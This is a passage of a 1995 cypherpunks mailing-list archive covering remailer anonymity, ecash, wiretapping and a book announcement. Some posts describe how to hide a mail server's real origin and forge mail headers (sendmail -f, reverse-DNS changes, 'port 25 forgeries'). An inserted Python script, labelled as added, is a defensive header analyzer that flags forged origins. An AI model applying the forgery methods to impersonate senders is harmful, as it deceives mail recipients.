Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Marner <dmarner@mis.nu.edu>
Date: Sat, 21 Jan 95 19:40:23 PST
To: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <m0rVsjT-000vEKC@myriad.pc.cc.cmu.edu>
Message-ID: <199501220337.DAA26921@mis.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 21 Jan 95 22:12 EST  Matthew Ghio wrote:

>
>Well, to obscure the origin of your outgoing mail, you could simply
>forward via another remailer.  However, delivering directly to SMTP
>port 25 would probably be a good idea.  Sendmail has an option to
>set the from using -f, but you have to have it configured to allow
>it.  Normally only root, uucp and daemon are allowed to use this
>option.

This still won't quite do it. Clever mailers on the other end of
the connection (sendmail included) will do a name lookup based on
the IP address.  This will (usually) return the system's canonical
name, and sendmail will make sure to stick that in the header. In 
fact, if identd is running on the sending system, it will even stick
in the userid of the sender. 

The fix involves changing the in-addr.arpa domain tables for that ip
address to make it report another name.  This will take complicity on
the part of whoever manages those tables, and will complicate things
when dealing with hosts on the remailer's local network. A good way to
work around this would be to slap another ethernet card in the machine
so it has two addresses, one configured normally for that network and
the other setup to be on remailer.net (or whatever.)

Since this includes the cooperation of a local network administrator
anyway, it makes most of the MX tricks a little less useful.
                                                    -- Dan
--
Dan Marner                             dmarner@mis.nu.edu
Network Weasel                         Finger for PGP 2.6 key including the
National University                    words "GMAAAEEAK", "god" and "JAAUR"
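
An added example, not part of Dan Marner's message or the archive: a receiving-side check that reads each Received: line and reports where the name given at HELO disagrees with what the receiver looked up from the connecting IP address, and whether an identd userid was recorded. The header layout `from HELO (ident@rdns [ip]) by host` is assumed from common sendmail 8 output, and every host name, address and header in the sample is constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed sendmail-style layout (not taken from the archive):
#   Received: from <helo-name> ([ident@]<reverse-dns-name> [<ip>]) by <receiver> ...
HOP_RE = re.compile(r"""
    ^Received:\s+from\s+(?P<helo>\S+)      # name the client claimed at HELO
    (?:\s+\(
        (?:(?P<ident>[^@\s()]+)@)?         # userid reported by identd, if any
        (?P<rdns>[^\s\[\]()@]+)?           # name from the in-addr.arpa lookup
        \s*
        (?:\[(?P<ip>[^\]]+)\])?            # address of the connecting host
    \))?
    \s+by\s+(?P<by>\S+)                    # host that wrote this line
""", re.IGNORECASE | re.VERBOSE)


@dataclass
class Hop:
    helo: str
    ident: Optional[str]
    rdns: Optional[str]
    ip: Optional[str]
    by: str
    findings: List[str] = field(default_factory=list)


def _norm(name: Optional[str]) -> Optional[str]:
    """Compare host names case-insensitively and without a trailing dot."""
    return name.rstrip(".").lower() if name else None


def received_lines(raw_message: str) -> List[str]:
    """Return the unfolded Received: headers, newest hop first."""
    head = re.split(r"\r?\n\r?\n", raw_message, maxsplit=1)[0]
    head = re.sub(r"\r?\n[ \t]+", " ", head)   # undo header folding
    return [l for l in head.splitlines() if l.lower().startswith("received:")]


def assess_hop(line: str) -> Optional[Hop]:
    """Parse one Received: line and attach findings about its origin data."""
    m = HOP_RE.match(line)
    if not m:
        return None
    hop = Hop(m["helo"], m["ident"], m["rdns"], m["ip"], m["by"])
    if hop.rdns is None and hop.ip is None:
        # Receiver recorded only what the client said about itself.
        hop.findings.append("unverified-origin")
    elif hop.rdns is None:
        hop.findings.append("no-reverse-dns")
    elif _norm(hop.rdns) != _norm(hop.helo):
        hop.findings.append("helo-mismatch")
    if hop.ident:
        hop.findings.append("ident-user")
    return hop


def analyze(raw_message: str) -> List[Hop]:
    return [h for h in map(assess_hop, received_lines(raw_message)) if h]


# Constructed message: four hops written by hypothetical receivers.
SAMPLE = """\
Received: from northpole.example (jdoe@shell.example.com [192.0.2.77])
\tby mx.example.net (8.6.9/8.6.9) with SMTP id XAA01234;
\tSun, 22 Jan 1995 00:10:00 -0800
Received: from relay.example.org (relay.example.org [192.0.2.10])
\tby mx.example.net with SMTP; Sun, 22 Jan 1995 00:09:00 -0800
Received: from northpole.example ([192.0.2.99]) by mx.example.net with SMTP;
\tSun, 22 Jan 1995 00:08:00 -0800
Received: from northpole.example by dumb.example.net with smtp;
\tSun, 22 Jan 1995 00:07:00 -0800
From: santa@northpole.example
Subject: constructed test message

body text
"""

if __name__ == "__main__":
    for hop in analyze(SAMPLE):
        print(hop.by, hop.helo, hop.rdns, hop.ip, hop.ident, hop.findings)
```

A hop flagged `unverified-origin` carries no receiver-side evidence at all, so the first hop that does record an address is the earliest point at which the path can be trusted.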




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sat, 21 Jan 95 19:14:02 PST
To: remailer-operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501211739.JAA00303@tower.stc.housing.washington.edu>
Message-ID: <m0rVsjT-000vEKC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Craig A. Johnston" <caj@tower.stc.housing.washington.edu> wrote:
> John A. Perry wrote:
> >
> > First of all, I hope you don't mind me posting this to a couple of
> > lists as I find your questions pertinent and should be of value to many
> > readers.
> 
> Oops, I actually meant to direct it to the list myself, but forgot
> to edit my headers.  Sure.
> 
> >
> > > To what extent can the operator of such a remailer really hide his
> > > actual site?
> >
> >       It depends on the level of control the remailer operator has on
> > the site that the remailer operates from.
> 
> Assume root.

What if the remailer operator is not root?

I will offer to forward mail for MX records to any address via my
system (myriad.pc.cc.cmu.edu).  If you want to run a remailer, and
have it be completely hidden from nameserver lookups, ask John Perry
to create an MX record for your domain which points to
myriad.pc.cc.cmu.edu, and tell me the address you want it forwarded
to.  I will configure my SMTP daemon to forward all mail to your
domain to the email address your remailer is run on.

> I know that you can set the 'masquerade as' thing in sendmail, but
> of course any other SMTP agents you deal with are going to
> correctly identify you when you 'HELO' and you're going to wind
> up in the header, somewhere... (well, except smail 3.1, and probably
> others.)  -- I'm assuming here the best one will be able to do will
> be equivalent to a forgery via port 25.

Well, to obscure the origin of your outgoing mail, you could simply
forward via another remailer.  However, delivering directly to SMTP
port 25 would probably be a good idea.  Sendmail has an option to
set the from using -f, but you have to have it configured to allow
it.  Normally only root, uucp and daemon are allowed to use this
option.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 21 Jan 95 20:12:49 PST
To: cypherpunks@toad.com
Subject: Remailer exit points
Message-ID: <9501220404.AA12395@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Y'know, after some thought, some of the concepts I made regarding data 
havens with anonymous locations might well apply to making exit-point 
remailers that are relatively immune from outside pressure.  Given a network 
of entry-point remailers with well-known public keys, you could advertise an 
exit-point remailer by only giving out encrypted address blocks for use with 
various well-known entry-point remailers and a public key.  The exit-point 
remailer could then substitute some random From: address and path entries to 
spoof the exit-point remailer's location.  The remailer's actual location 
would only be known by the entry point remailers, and since their 
involvement is stripped by the exit-point remailers, no one would know who 
they are to complain to them.

The spoofed exit-point remailer location could be handled by disposable MX 
entries, of the sort discussed here earlier, if it is deemed desirable to 
make the From: address valid.  The remailer operator could get the actual 
complaints, to deal with as he would.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 21 Jan 95 20:39:40 PST
To: cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <9501220430.AB13255@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 1/21/95, Timothy C. May wrote:
> ... Check out comp.org.eff.talk for discussion of how "professional
>locksmiths" are angry that "amateur locksmiths" (unlicensed, not real
>members of the Brotherhood) are using the Net to disseminate and
>discuss the Secret and Most Arcane Knowledge of the Guild.
>
>And alt.locksmithing is carrying the stuff. ...

I checked out alt.locksmithing, based on some commentary I saw over in 
alt.current-events.net-abuse, and to be perfectly honest, there isn't really 
all that much going on along these lines, certainly nothing on the order of 
magnitude of the alt.religion.scientology crap.  One or two soreheads, but 
by net.standards they don't even really qualify as significant flamers, and 
a few (apparently) professional locksmiths who are talking about things in a 
rather friendly fashion.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: santa@northpole, org
Date: Sat, 21 Jan 95 23:55:03 PST
To: cypherpunks@toad.com
Subject: port 25 forgeries
Message-ID: <9501220736.AA22783@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Here's a port 25 forgery.  One could probably do a better one, but this
one shows you what still winds up in the headers and one can't do anything
about when dealing with sendmail or an equally smart SMTP agent.

Note that smail 3.1 is stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Sun, 22 Jan 95 00:05:23 PST
To: Dan Marner <dmarner@mis.nu.edu>
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501220337.DAA26921@mis.nu.edu>
Message-ID: <Pine.NXT.3.91.950121235916.6029A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Jan 1995, Dan Marner wrote about one machine having two 
canonical names:

> A good way to
> work around this would be to slap another ethernet card in the machine
> so it has two addresses, one configured normally for that network and
> the other setup to be on remailer.net (or whatever.)

  or, a less expensive solution if you use BSDI or Linux, set up an alias 
or a dummy interface (virtual interface). (under linux you also have to 
add a route from your real interface to it.) it's what i do.
   this also requires another IP address and hence cooperation of whoever 
is giving you IP numbers, but it works like a charm.

-adam

Adam Feuer
adamfast@seanet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nutty_elf@northpole.org
Date: Sun, 22 Jan 95 00:12:52 PST
To: cypherpunks@toad.com
Subject: hmmm, port 25
Message-ID: <9501220810.AA24523@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


That's strange, that last port 25 forgery didn't behave as expected.
Just checking it.

--nutty elf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Date: Sun, 22 Jan 95 00:37:00 PST
To: duquesne duke <an172607@anon.penet.fi>
Subject: Re: cel fraud
In-Reply-To: <9501071759.AA00953@anon.penet.fi>
Message-ID: <Pine.3.05.9501220348.A21277-c100000@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain



Oh brother, here we go again.  Now the bandits are not only going to listen in
for the serial numbers of the phone, but they'll listen in for (what?) touch
tones of the block out numbers passwords?

This has certainly not stopped promiscuous mode ethernet sniffers from grabbing
passwords, and I doubt it would long keep the bandits out... :-(

If only these guys would wake up and use strong crypto...  This is a perfect
example of a government caused fucked up on a grand scale due to the fact that
we now have an installed base of millions of insecure cell phones and cell
stations.   It's probably not too late for the cell companies to start
introducing crypto cell phones, but the longer they wait, the harder the switch,
and what's worse is that they've taken the attitude that "So what if we lose
millions, we'll just raise the prices and get it all back anyway."

You certainly won't find me sporting a cell phone until we get something a bit
more secure.  :-I  At least the beeper black market isn't as vicious...

===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 22 Jan 95 03:35:02 PST
To: cypherpunks@toad.com
Subject: TJOAUC 1-7
Message-ID: <199501221133.DAA20304@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Recently received by email:
  =======================================================================
 
  THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly
  ======================================================================
  ISSN 1074-3111         Volume One, Issue Seven        January 17, 1994
  ======================================================================
    available for download as jauc1-7.zip of 180Kbytes from

   ** ftp site: etext.archive.umich.edu    /pub/Zines/JAUC
   ** ftp site: ftp.fc.net                 /pub/tjoauc

    of cp interest I thought:


 Call Security / Voice Crypto FAQ                     Neil Johnson

 Telecommunications Security                          Howard Fuhs

    and seen here first:

 My Life As An International Arms Courier             Matt Blaze

    lots more deleted for brevity,
    listed in the titles.txt file in the .zip
    



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sun, 22 Jan 95 05:45:22 PST
To: cypherpunks@toad.com
Subject: CPs write code: PRNG conditioning
Message-ID: <199501221345.IAA10847@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


See ftp://ftp.clark.net/pub/cme/  for code to condition random numbers
and pseudo-random numbers.  There's more to come.

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sun, 22 Jan 95 07:47:00 PST
To: David Murray <davidm@iconz.co.nz>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <199501220204.PAA29874@iconz.co.nz>
Message-ID: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


Many companies are already founded on "a web of debt".
"Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
(Real Estate Loans)," all come to mind at the moment. They're nicely
formatted, processed and make even more money for investors as the
interest rates change.

So maybe the remailer IOU's, could be traded for the data haven IOU's,
and so forth. I think someone does have a credit card IOU situation.
The systems, and precedence for debt trading are there (and interest
rates are going up again soon, indicated the Fed last week!).

I just wonder who wants to play "collection agency"?

Love Always,

Carol Anne

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sun, 22 Jan 95 14:07:16 PST
To: cypherpunks@toad.com
Subject: Another Book By Schneier...
Message-ID: <yqd8lOwsccZQ077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on one of the cryptography conferences.....

From: schneier@chinet.chinet.com (Bruce Schneier)
Subject: E-Mail Security - New book by Bruce Schneier
Message-ID: <D2qsIJ.Dzz@chinet.chinet.com>
Organization: Chinet - Public Access UNIX
Date: Sat, 21 Jan 1995 06:25:31 GMT


                E-MAIL SECURITY WITH PGP AND PEM:
          HOW TO KEEP YOUR ELECTRONIC MESSAGES PRIVATE

                 ...a new book by Bruce Schneier

                     John Wiley & Sons, 1995
                       ISBN  0-471-05318-X
                             $24.95

The world of e-mail is the world of postcards.  Between you and
your correspondents may lurk a foreign government, a business
competitor, an overzealous law enforcement agency, or even just a
nosy neighbor.  The problem is, all of these potential
eavesdroppers, given fairly simple access tools, can read your
messages as easy as a postal worker can read your postcards.

E-MAIL SECURITY is about protecting electronic mail from spies,
interlopers, and spoofs--people who may want to destroy, alter,
or just look at your private communications.  The book shows how
you can protect the financial information, contract negotiations,
or personal correspondence you entrust to public or private
networks--and it shows how this protection is available right
now, with free or inexpensive software.

The book discusses PGP and PEM: how they work, how they are
different, and how to choose which one is right for you.


TABLE OF CONTENTS:

Part I:  Privacy and Electronic Mail
     Chapter 1:     The Problem
     Chapter 2:     Encryption
     Chapter 3:     Key Management
     Chapter 4:     Authentication
     Chapter 5:     Certificates
     Chapter 6:     Keeping Your Private Key Private
     Chapter 7:     Odds and Ends
     Chapter 8:     Patents, Governments, and Export Laws

Part II:  Achieving Electronic-Mail Privacy
     Chapter 9:     Requirements and Features
     Chapter 10:    Privacy Enhanced Mail (PEM)
     Chapter 11:    Pretty Good Privacy (PGP)
     Chapter 12:    Comparing PGP and PEM
     Chapter 13:    Attacks Against PGP and PEM

Appendix A:    Pretty Good Privacy

Appendix B:    Privacy Enhanced Mail

*****************************************************************

If you are interested in a copy of E-MAIL SECURITY, please send a
check for $25 + $5 postage (ask for rates abroad) to:

     Bruce Schneier
     730 Fair Oaks Ave
     Oak Park, IL  60302

The book won't be available until at least the end of the month,
so please be patient.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 12:23:47 PST
To: rishab@dxm.ernet.in
Subject: "Internetpol"
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <199501222022.MAA14828@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> The Religious Alliance Against Pornography has been holding a biggish 
> conference in Manila; the focus is on child pornography, and a major topic
> of discussion is the evil of electronic networks. The Interpol is among those
                                                    ^^^^^^^^^^^^
> participating; the head of their kiddie-porn division claims Britain is the
> source of most European stuff, and bemoans the fact that too little is spent
> on monitoring traffic, as the war against drugs is considered more important.

Perhaps it will become "Internetpol"?

Seriously, there is considerable danger that the growing chorus of
alarmist nonsense about the Net being used for child porn, for snuff
films, for weapons secrets deals, etc., will result in the U.S.
Net.Cops linking up with their European and Asian associates.

The recent stuff on "international key escrow," a la the conference
last September, is worrisome.

(I don't think they can win, of course, but any acceleration of their
efforts is cause for increased vigilance.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 22 Jan 95 12:27:20 PST
To: bdolan@well.sf.ca.us (Brad Dolan)
Subject: Re: *More* wiretaps?
In-Reply-To: <199501201935.LAA03670@well.sf.ca.us>
Message-ID: <9501222025.AA05598@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Associated Press reported on 1/20/95:
>  
> >Secretary of State Warren Christopher Friday announced 
> >plans to combat narcotics smuggling and terrorism with tougher 
> >laws and sentences and tighter control on visas for entering the 
> >United States. 
> >   
> >A senior State Department official said wiretapping was among the 
> >measures to be proposed to the Republican-controlled Congress. The 
> >official said there were ways to use wiretaps without violating 
> >Supreme Court restrictions. 
> 
> 
> Since wiretapping on court order from their no-questions-asked secret 
> court is already allowed, can they mean anything other than wiretapping 
> without court order?
> 
> Can somebody explain to me why the Clinton administration is
> considered "liberal"?  Why the Republicans are considered
> "conservative"?

To make it appear as though a choice exists in the American political
system.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Jan 95 09:42:50 PST
To: cypherpunks@toad.com
Subject: Re: Locksmith's Guild wants limit on free speech
Message-ID: <199501221742.MAA25260@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Commenting on Tim's comment about the decline of the guilds of "licensed
professionals" (I'm a licensed architect long-time arguing against the
breed's conceits and camouflages and irresponsibilities): 
 
 
Here in NYC there is a new trial policy to allow architects and engineers
to "self-certify" their construction documents as in compliance with the
building code rather than being approved by a municipal examiner. 
 
 
Over decades a sub-species has grown called "code consultants" or
"expediters", which advises and processes documents for A-E's who have
become ignorant of the arcana of the building code.  This group of several
hundred, has pretty muchly dominated, by default or by design, the
non-governmental side of construction through their specialized knowledge
of the code, procedures, interpretations, regulations and who to see for
favorable treatment in the Building Department. 
 
 
A-E's used these folks with happiness, usually, for it relieved the
self-certified high-minded animals to concentrate on the important stuff of
design and schmoozing and puffing feathers. 
 
 
On the municipal side, agency employees found that it was easier to deal
with these consultants than contrary professionals.  And, the culture
welcomed ex-public officials into their well-paid ranks to lubricate the
wheels. 
 
 
An odd result so far is that while owners and professionals like the idea
of speeding up the process they are reluctant to take on the concomitant
responsibility for deficiencies in meeting code standards in final
construction.  The city will inspect 20% to keep tabs. 
 
 
Both fear that they do not know the code well enough to take the risk of
being found at fault by random municipal inspections of construction. 
A-E's dread the liability and blame by owners for well-known construction
corner-cutting, and owners suspect their professionals' competency and
ethics -- afraid that the pros will certify in ignorance or cupidity and
that the owners will face costly corrections without having the traditional
scapegoat of over-weening government to justify cheating in the field. 
 
 
The code consultants I've talked to say they wait for the animals
frightened of their own shadows to return to the safe stables.  
 
 
Perhaps "code consultants" precurse the trajectory of cryptographers? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 14:19:51 PST
To: rishab@dxm.ernet.in
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <Pine.3.89.9501221445.A8848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995 rishab@dxm.ernet.in wrote:
> The Religious Alliance Against Pornography has been holding a biggish 
> conference in Manila; the focus is on child pornography,

These international conferences are usually held in pleasant
tourist spots, and most of the participants usually members
of QUANGOs -- nominally private organizations that directly
or indirectly receive large amounts of government funds.

The major tourist attraction of the Philippines is of course
the large number of whores available at very cheap prices -- many
of them extremely young.

Now the American religious right receives very little money
from the government (as yet) so I doubt there are too many
US Christian rightists attending the conference.

Both Australia and England have government established
religions, so I expect there was a major turn out from
those two nations.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 14:34:16 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Internetpol"
In-Reply-To: <9501222048.AA09932@snark.imsi.com>
Message-ID: <Pine.3.89.9501221412.A8848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Perry E. Metzger wrote:
> I spoke with Stuart Baker for a while, during which time he informed
> me that he didn't think the internet could possibly last

I find that most statists on the internet assume that the internet
is some kind of government service.

When they discover that it is not, they wonder how it can possibly
exist, and assume it will soon collapse.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anthony Wm. Iannotti" <tony@fred.secapl.com>
Date: Sun, 22 Jan 95 11:50:51 PST
To: p.v.mcmahon.rea0803@oasis.icl.co.uk
Subject: test
In-Reply-To: <9412071749.AA07438@getafix.oasis.icl.co.uk>
Message-ID: <Pine.3.89.9501221416.B196708-0100000@fred.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain



   Please ignore & delete. I am a test. (I seem to be cut off from the 
mailing list, possibly by my company's firewall.......)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:05:54 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501220204.PAA29874@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Sat, 21 Jan 1995 15:18:48 +1300
>> From: davidm@iconz.co.nz (David Murray)

>> The best way to underpin the value of ecash is for the issuer to (credibly)
>> undertake to convert it into real money.
>
>  And since I would only make the promise to the few people that I am
>connected to in the debt-trust web, this is doable.  I doubt I could
>convince all of you that I was good for $10, but I bet there are a few
>readers on this list that I *could* convince.  They would be able to
>convince a few others that _they_ are worth $10, etc.

But this, I suggest, is thinking too small, as well as (or, as a consequence)
compromising anonymity somewhat. Which is not to say a central ebank is
necessary -- just that (legally enforceable, audited) IOUs from a corporation
that I knew could pay (because it makes its living from being able to pay)
would be preferred by me, even if I (my computer) knew that Alice's IOU is
backed by Bob's which is backed by ... Zane's, who I would trust with my
life (since he saved me in a boating accident 7 years ago...).

Of course, the two systems can/should coexist. In fact, they're probably the
same thing at different granularities. An ordinary bank takes deposits
(issues IOU's to depositors) and lends the money out (collects IOU's from
debtors). [The flow of credit is just the flow of debt backwards -- like
current and electrons :-)] People trust bank IOUs because of the portfolio
of IOUs it has collected (a certain mandated number from the Government, 
a certain proportion backed by property etc), and, probably, because it
has received more IOUs than it has issued (so that the IOUs from Donald
Trump and Orange County don't bring the system down...).

On this analysis, the web of debt-trust is just an ultimately distributed
bank. Instead of the bank collecting the ten dollars everyone is good for
(in return for IOUs) and then lending it back out to the system (in return
for IOUs), everyone's individual IOU underpins the system. This seems to
leave the portfolio problem to the distributedness and interlinkicity of 
the e-economy (everyone essentially holds the market portfolio), or up to
the individual to balance. Personally, I would be unhappy to hold my
e-wealth in such a way that it was ultimately underpinned by the IOUs of a
group of people living in California...

>  This system might even dodge the laws governing banking in various
>jurisdictions ... though I doubt it.  It quacks, waddles, and water
>runs off its back...

I don't think the banking laws are such a big problem. [Feel free to 
enlighten me.] The ordinary business of banking involves borrowing money
from people in a special way (deposits) and lending to people, again in
a characteristic way. But it is not simply borrowing and lending -- every
business does that (borrows from banks, and, increasingly, in markets;
lends (extends credit to) customers).

Imagine a corporation that issued bearer bonds, and invested the proceeds
in t-bills (or term deposits, or call accounts). Imagine that the bonds 
(IOUs) were issued at face value, carried no interest, and could be cashed
in by the holder at any time. Imagine further that the bonds were
represented by bytes, and transferable anonymously. That is, the bonds are 
ecash, and the corporation is an ebank.

But it is not a bank-bank. It is not borrowing money in a
characteristically bankish way, and it is not lending the money in a
characteristically bankish way. It doesn't raise the regulatory/consumer protection/
handholding or multiplier effect/credit expansion problems that
(supposedly) underlie banking supervision regulations. In short, ladies
and gentlemen, it is my submission that it is not, in fact, in the final
analysis, when looked at from all angles in the correct way, at all, a
duck.

Cheers.

D

[Although this doesn't entirely answer your point. I don't think the 
distributed/web of debt-trust system would be a bank, either, although
it might be a credit union. And you would have to pay tax on all those 
IOUs you collected ;-) ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schneier@chinet.chinet.com
Date: Sun, 22 Jan 95 13:24:34 PST
To: cypherpunks@toad.com
Subject: E-Mail Security - New Book
Message-ID: <m0rW9Ow-000jq0C@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain



                E-MAIL SECURITY WITH PGP AND PEM:
          HOW TO KEEP YOUR ELECTRONIC MESSAGES PRIVATE

                 ...a new book by Bruce Schneier

                     John Wiley & Sons, 1995
                       ISBN  0-471-05318-X
                             $24.95

The world of e-mail is the world of postcards.  Between you and
your correspondents may lurk a foreign government, a business
competitor, an overzealous law enforcement agency, or even just a
nosy neighbor.  The problem is, all of these potential
eavesdroppers, given fairly simple access tools, can read your
messages as easily as a postal worker can read your postcards.

E-MAIL SECURITY is about protecting electronic mail from spies,
interlopers, and spoofs--people who may want to destroy, alter,
or just look at your private communications.  The book shows how
you can protect the financial information, contract negotiations,
or personal correspondence you entrust to public or private
networks--and it shows how this protection is available right
now, with free or inexpensive software.

The book discusses PGP and PEM: how they work, how they are
different, and how to choose which one is right for you.


TABLE OF CONTENTS:

Part I:  Privacy and Electronic Mail
     Chapter 1:     The Problem
     Chapter 2:     Encryption
     Chapter 3:     Key Management
     Chapter 4:     Authentication
     Chapter 5:     Certificates
     Chapter 6:     Keeping Your Private Key Private
     Chapter 7:     Odds and Ends
     Chapter 8:     Patents, Governments, and Export Laws

Part II:  Achieving Electronic-Mail Privacy
     Chapter 9:     Requirements and Features
     Chapter 10:    Privacy Enhanced Mail (PEM)
     Chapter 11:    Pretty Good Privacy (PGP)
     Chapter 12:    Comparing PGP and PEM
     Chapter 13:    Attacks Against PGP and PEM

Appendix A:    Pretty Good Privacy

Appendix B:    Privacy Enhanced Mail

*****************************************************************

If you are interested in a copy of E-MAIL SECURITY, please send a
check for $25 + $5 postage (ask for rates abroad) to:

     Bruce Schneier
     730 Fair Oaks Ave
     Oak Park, IL  60302

The book won't be available until at least the end of the month,
so please be patient.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:27:01 PST
To: cypherpunks@toad.com
Subject: Supreme Court, free speech, anon remailers...
